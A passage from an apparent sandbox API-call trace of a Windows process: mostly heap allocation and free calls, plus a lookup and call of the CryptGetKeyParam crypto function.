0x43e2710 [0118.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0118.279] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.279] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0118.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0118.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.280] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0118.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0118.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.281] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0118.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.281] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0118.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0118.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0118.282] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0118.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.282] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0118.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0118.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0118.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0118.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0118.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0118.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0118.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0118.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0118.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0118.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0118.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797128 [0118.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0118.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0118.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0118.289] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0118.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0118.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0118.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0118.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0118.289] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2810, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2810*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0118.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 